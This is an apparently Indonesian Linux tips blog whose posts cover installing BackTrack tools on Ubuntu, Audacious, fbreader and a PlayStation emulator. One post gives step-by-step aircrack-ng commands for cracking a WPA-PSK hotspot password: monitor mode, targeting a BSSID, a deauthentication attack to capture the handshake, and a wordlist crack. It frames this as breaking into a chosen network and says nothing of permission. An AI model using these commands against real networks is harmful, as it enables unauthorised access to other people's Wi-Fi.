Senin, 20 Februari 2012 - 8 komentar

Install Tool Backtrack 5 di Ubuntu

Bagi yang pengen ngerasain tool-tool dari Backtrack tapi gak pengen download file ISO nya, tenang saja, kita bisa mencobanya di ubuntu, karena sekarang Backtrack sudah memutuskan untuk beralih ke .deb

Tambahkan repository Backtrack lewat sudo gedit /etc/apt/sources.list
Repo resmi Backtrack
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Repo lokal juga ada:
deb http://backtrack.indowebster.com/repo/all revolution main microverse non-free testing
deb http://backtrack.indowebster.com/repo/32 revolution main microverse non-free testing
deb http://backtrack.indowebster.com/repo/source revolution main microverse non-free testing
 
Jangan lupa ketik log ini  wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add - 

Update repositorinya sudo apt-get update


Selamat mencoba
»»  Next...
- 2 komentar

Letak FIle yang di Download dari Terminal atau Synaptic Package Manager

Jadi penasaran, di folder letak file-file hasil upgrade atau download tersimpan??
Dapat referensi dari sini 
Ketik perintah ini di terminal ls /var/cache/apt/archives/



»»  Next...
Rabu, 15 Februari 2012 - , 0 komentar

Bobol Password WEP-PSK Dengan Linux

Kali ini, aku akan mencoba sedkit memberi penejelasan bagaimana sih cara membobol password hotspot yang bertipe wpa-psk dengan mudah.
Cara ini bisa menggunakan linux backtrack 4 dinal release atau linux apapun tertama asal sudah terinstall aplikasi aircrack-ng. Nda berlama-lama mari simak artikel berikut.
Pertama, siapkan CD Live Backtrack atau bisa make linux ubuntu dengan menginstall aplikasi aircrack-ng. Ketik perintah di bawah untuk menginstall aircrack-ng di linux ubuntu
sudo apt-get install aircrack-ng
Kedua,  masuk ke dekstop dengan perintah ~# startx (untuk yang make backtrack)
Ketiga,  buka konsole (terminal) dan ketikkan perintah untuk melihat interface device yang ada
sudo su
ifconfig -a
Keempt, ketikkan perintah di bawah untuk mengaktifkan interface wlan0
ifconfig wlan0 up
Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.
airmon-ng start wlan0
Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.
airodump-ng mon0
cat : mon0 adalah interface virtual hasil dari airmon-ng tadi
Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.
airodump-ng -w coba –channel 11 –bssid 001122334455 mon0
ket: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama ‘coba’
Selanjutnya, gunakan serangan dengan cara disconnect salah satu client  untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0
ket: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt
ket : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt
Oiya, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya. Jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang kita miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal. Dan akhirnya, yang sedikit dari aku ini semoga membantu buat pengetahuan yang belum tau aja. 
 
 Selamat mencoba
»»  Next...
Jumat, 03 Februari 2012 - 0 komentar

Update: Audacious 3.2

Audacious 3.2, tool pemutar mp3 di Ubuntu yang mirip dengan Winamp di windows ini telah merilis versi finalnya. Apa saja yang ditanam pada Audacious versi terbaru ini, berikut penjelasan yang saya kutip dari sini
  • Plugin music library yang baru, yang memungkinkan kamu mencari seluruh koleksi musik kamu dan dengan mudah membuat daftar main.
  • MPRIS v2 dukungan yang memungkinkan Audacious untuk mengintegrasikan dengan Menu Suara Ubuntu atau GNOME Shell (melalui ekstensi seperti GNOME Shell MediaPlayer).
  • GTK interface improvements: tombol baru untuk mengaktifkan pencarian cepat baru on / off, tombol untuk menutup dan menambahkan playlist baru tab, menu drop-down untuk mengaktifkan dan menonaktifkan plugin visualisasi, dan item menu untuk menghapus file dari daftar main tidak tersedia.
  • Banyak perubahan yang berkaitan dengan penanganan playlist besar (puluhan ribu entri) lebih efisien.
  • Waktu startup, penggunaan memori, dan disk writer dikurangi secara significant. 
Untuk menginstalnya di ubuntu 11.10 atau 12.04 atau 10.10 seperti yang saya lakukan berikut caranya: 
  1. buka terminal
  2. ketik atau copas kode command dibawah ini:
sudo add-apt-repository ppa:nilarimogard/webupd8 
sudo apt-get update 
sudo apt-get install audacious

Berikut screenshotnya

gtk interface:

winamp classic interface:

-Selamat Mencoba-


»»  Next...
- 4 komentar

Membaca File *.prc di Ubuntu


Lagi ketagihan serial Sherlock Holmes, udah liat filmnya, sekarang pengen baca novelnya, hehe... di pamerin do'i katanya novelnya bagus, mumpung dirumah ada modem iseng-iseng deh cari file e-booknya di internet. Ketemu! dan ternyata setelah di ekstrak filenya dalam bentuk *.prc, duhh...gimana niihh... kalo di windows kita bisa install mobipocket reader buat baca file ini, tapi kalo di ubuntu???

setelah cari-cari info dari google, ternyata ketemu juga solusinya, namanya fbreader, tool ini yang akan membantu saya, dan kita, untuk membaca file dengan format *.prc.

Instalasinya cukup mudah
  1. jalankan Terminal
  2. ketik sudo apt-get install fbreader
Selesai, dan kita bisa membaca file dengan format *.prc

ni screenshotnya ^_^


- Selamat mencoba -

»»  Next...
Rabu, 01 Februari 2012 - 0 komentar

MAEN PS DI UBUNTU


Nostalgia sama game Crash Team Racing? Dino Crisis? seri Final Fantasy? Pengen main game PS tapi ga punya PS? Jangan khawatir, Ubuntu bisa dipake buat maen PS kok :)
Mau tau caranya?
Ok, mari kita mulai...


Langkah 1:
Masukan repo getdeb terlebih dahulu, terutama yg untuk bagian games. Buka terminal kemudian ketik:


sudo gedit /etc/apt/sources.list
Setelah itu tambahkan dua repo getdeb di bawah ini:
deb http://archive.getdeb.net/ubuntu lucid-getdeb apps
deb http://archive.getdeb.net/ubuntu lucid-getdeb games


Save (Ctrl+S), kemudian tutup. Setelah itu di terminal ketik:
sudo apt-get update

note: repo getdeb diatas untuk lucid, klo pengguna maverick tinggal ganti aja yg "lucid" jadi maverick

Langkah 2:
Setelah update selesai, sekarang mari kita instal PCSX, di terminal ketik:
sudo apt-get install pcsxr

Langkah 3:
Setelah instalasi selesai, Situ bisa buka PCSX di Games > PCSX tapi blom bisa dimainin karena ga ada BIOS PS nya.
BIOS PS yang banyak digunakan adalah SCPH 1001 dan SCPH7502, meskipun sebenernya semua game bisa dijalankan di BIOS SCPH7502 tapi SCPH1001 ini penting klo misalnya ada yg ga bisa jalan di SCPH7502.
so download aja keduanya disini:
BIOS PSX (scph1001.bin)
BIOS PSX (scph7502.bin)



Langkah 4:
Setelah kedua BIOS itu di download, ekstrak kedua file tersebut, kemudian copy file SCPH1001.bin dan SCPH7502.bin ke ~/.pcsx/bios/
Caranya, cukup tekan Ctrl+H di File manager hingga semua folder dan file yg mempunyai tanda titik di depannya muncul semua, lalu cari dan klik folder .pcsx > bios kemudian paste deh kedua file tsb. lihat gambar


Langkah 5:
Buka PCSX di Games > PCSX
Klik Configuration > Plugins & BIOS atau tekan Ctrl+P sampe muncul jendela konfigurasi
Nah, sekarang liat pada bagian BIOS


disitu tertera Internal HLE Bios. Ganti ke SCPH7502.bin, setelah itu tutup.


Langkah 6:
Sekarang udah bisa memainkan game PS, baik yg iso (Ctrl+I) ataupun yg CD (Ctrl+O)

Update:

Nah, sekarang saya mo update, jika kamu mengalami masalah grafis atau suara saat bermain games, ga ada salahnya untuk menambahkan plugins kedalam PCSX supaya makin mantebh :)
Caranya:
Download plugin grafis dan suara dibawah ini:
P.E.Op.S./Pete's MesaGL Linux PSX GPU (grafik)
P.E.Op.S. Linux OSS/ALSA PSX SPU (suara)
Setelah di download, ekstrak kedua file tersebut (terserah mo menggunakan terminal atau GUI). Setelah di ekstrak, lihat di folder plugin grafik, didalam folder hasil ekstrak tersebut ada file sebagai berikut
cfgPeopsMesaGL
libgpuPeopsMesaGL.so.1.0.78
version.txt
gpuPeopsMesaGL.cfg
readme.txt

File libgpuPeopsMesaGL.so.1.0.78 dan file gpuPeopsMesaGL.cfg di copas kedalan folder ~/.pcsx/plugins/
Sedangkan file cfgPeopsMesaGL di copas kedalam folder ~/.pcsx/plugins/cfg/
Udah selesai? sekarang kembali ke folder plugin suara yang barusan di ekstrak, di dalam folder itu ada file sebagai berikut:
cfgPeopsOSS
readme_1_9.txt
version_1_9.txt
libspuPeopsOSS.so.1.0.9
spuPeopsOSS.cfg

Sama seperti sebelumnya, file libspuPeopsOSS.so.1.0.9 dan file spuPeopsOSS.cfg di copas kedalam folder ~/.pcsx/plugins/
dan file cfgPeopsOSS di copas kedalam ~/.pcsx/plugins/cfg/

Setelah selesai, buka pcsxnya seperti biasa di menu. Setelah terbuka, klik Configurations>Plugins&BIOS
Ketika jendelanya udah terbuka, klik drop-down box Graphics, pilih PE.Op.S MesaGL Driver 1.1.78.
Lakukan juga terhadap Sounds, ganti ke PE.Op.S OSS Audio Driver 1.1.9. Klo dah beres, di close aja dan silahkan coba dengan game-game anda. Hope it works for you guys :)
»»  Next...